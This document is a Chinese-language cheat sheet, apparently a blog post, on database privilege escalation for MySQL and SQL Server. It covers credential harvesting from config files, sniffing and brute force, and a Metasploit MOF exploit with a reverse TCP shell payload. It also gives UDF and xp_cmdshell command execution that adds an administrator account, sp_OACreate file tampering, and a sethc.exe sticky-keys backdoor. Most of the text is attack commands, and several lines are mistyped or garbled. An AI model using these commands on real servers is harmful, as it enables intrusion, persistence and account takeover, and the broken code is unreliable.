1 Mysql数据库漏洞提权
- 一般Mysql数据库经常使用php进行连接,会有较少的情况使用jsp,python等
- Mysql连接文件一般为conn.php、config.php、common.inc.php、config.inc.php等
- 所说的mysql权限提升一般在root权限下
1.1 数据库查询
select Host,user,password from mysql.user #需要有root权限
1.2 配置文件读取
网站源码泄露情况主要以程序员上传代码到git等开源平台或更新代码时未删除备份文件(.svn .git .bak),以及运维人员打包源代码到网站服务器(www.rar等)。
user.frm
user.MYD
user.MYI
1.3 下载user文件
user文件在mysql的data目录下
select @@basedir #当前数据库地址
select @@plugin_dir #>5.1
2 提权实战
2.1 Mof(托管对象格式)
提权c:/windows/system32/wbem/mof/
- use exploit/windows/mysql/mysql_mof
- set password xxx
- set username xxx
- set rhost xxx
- set rport xxx
- set payload windows/shell_reverse_tcp
- set lhost xxx
- set lport xxx
- exploit
2.2 Udf(用户定义函数)提权
- 导出C:\windows\udf.dll
- Create Function cmdshell returns string soname 'udf.dll';
- select cmdshell('whoami')
- drop function cmdshell
2 Sql Server 漏洞利用与提权
2.1 SA口令获取方法
2.1.1. Webshell或源码获取
一般在网站的配置文件中有存放明文账号密码,常用配置文件名如:
conn.aspx
config.aspx
config.php
web.config
.........
一般格式如:
server=localhost;
UID=sa;
PWD=shadowflow
2.1.2源代码泄露
网站源码泄露情况主要以程序员上传代码到git等开源平台或更新代码时未删除备份文件(.svn、.git、.bak),以及运维人员打包源代码到网站服务器(www.rar等)。
2.1.3嗅探
在局域网中使用cain等工具进行arp嗅探的时候可以抓取到1433端口的数据库明文登陆密码
2.1.4口令暴力破解
利用mssql暴力破解工具对mssql进行暴力破解,一旦成功将获得sa相应权限
2.2 常用SQL Server提权语句
查看数据库版本
select @@version
查看数据库系统参数
exec master..xp_msver;
查看用户所属角色信息
sp_helpsrvrolemember
查看当前数据库
select db_name()
显示机器上的驱动器
xp_availablemedia
查看当前账户权限
select IS_SRVROLEMEMBER('sysadmin') #判断是否为sa权限
类似serveradmin,setupadmin,securityadmin,diskadmin,bulkadmin
select IS_MEMBER('db_owner') #判断是否为dbo权限
添加用户
exec master.dbo.sp_addlogin test,password #添加用户
exec master.dbo.sp_addsrvrolemember test,sysadmin #加权限
启动停止服务
exec master..xp_servicecontrol 'stop','test'
exec master..xp_servicecontrol 'start','test'
检查功能
SELECT count(*)FROM master.dbo.sysobjects WHERE name='xp_cmdshell'
xp_cmdshell, xpregread,sp_makewebtask,xp_subdirs,xp_dirtree, sp_addextendedproc
xp_cmdshell
- 开启xp_cmdshell存储过程
EXEC sp_configure 'show advanced options',1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE; - 关闭xp_cmdshell存储过程
EXEC sp_configure 'show advanced options', 1, RECONFIGURE;
EXEDC sp_configure 'xp_cmdshell',0;RECONFIGURE; - xp_cmdshell执行命令
exec master..xp_cmdshell 'ver'
exec master.dbo.xp_cmdshell 'net localgroup administrators test /add' - 恢复xp_cmdshell
- exec sp_dropextendedproc 'xp_cmdshell'
- dbcc addextendedproc ("xp_cmdshell","xplog70.dll) OR
dbcc addextendedproc ("xp_cmdshell","d:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll");EXEC sp_configure 'show advanced options', 0 --
sp_OACreate
- 开启sp_OACreate
exec sp_configure 'show advanced options', 1;RECONFIGURE;
exec sp_configure 'Ola Automation Procedures' , 1;RECONFIGURE; - 关闭sp_OACreate
exec sp_configure 'show advanced options',1;RECONFIGURE;
exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE; - 禁用advanced options
EXEC sp_configure 'show advanced options',0;GO RECONFIGURE; - sp_OACreate执行命令
1.DECLARE @js int
1.EXEC sp_OACreate 'ScriptControl',@js OUT
3.EXEC sp_OASetProperty @js,'Language','JavaScript'
4.ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'
-
sp_OACreate移动文件
declare @aa int
exec sp_oacreate 'scripting.filesystemobject' @aa out
exec sp_oamethod @aa, 'moveFile',null,'c:\temp\ipmi.log','c:\temp\ipmi1.log'; -
sp_OACreate复制文件
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
7.sp_OACreate删除文件
DECLARE @Result int
DECLARE @FSO_Token int
EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT
EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile',NULL,'c:\Documents and Settings\All Users\ [开始] 菜单\程序\启动\user.bat'
EXEC @Result = sp_OADestrop @FSO_Token
- wscript.shell执行命令
- Shell.Application执行命令
- sp_oacreate 替换粘贴键
沙盒执行命令
- openrowset开启
- openrowset关闭
3.沙盒执行命令
注册表篡改
- 注册表劫持粘贴键
sql server提权总结
总结.PNG
sa权限下
- 存在xp_cmdshell时
使用xp_cmdshell执行命令添加用户,当出现错误可以恢复和开启xp_cmdshell- xp_cmdshell无法使用时
使用sp_OACreate执行命令,同样当出现错误可以恢复和开启- 当执行命令无法使用时可以用沙盒提权 (使用xp_regwrite和openrowset)
- 当只有xp_regwrite可用时可以劫持粘滞键(sethc.exe)
使用xp_regwrite修改注册表
db_owner权限下
- 备份到网站目录
- 通过备份文件到启动项提权
网友评论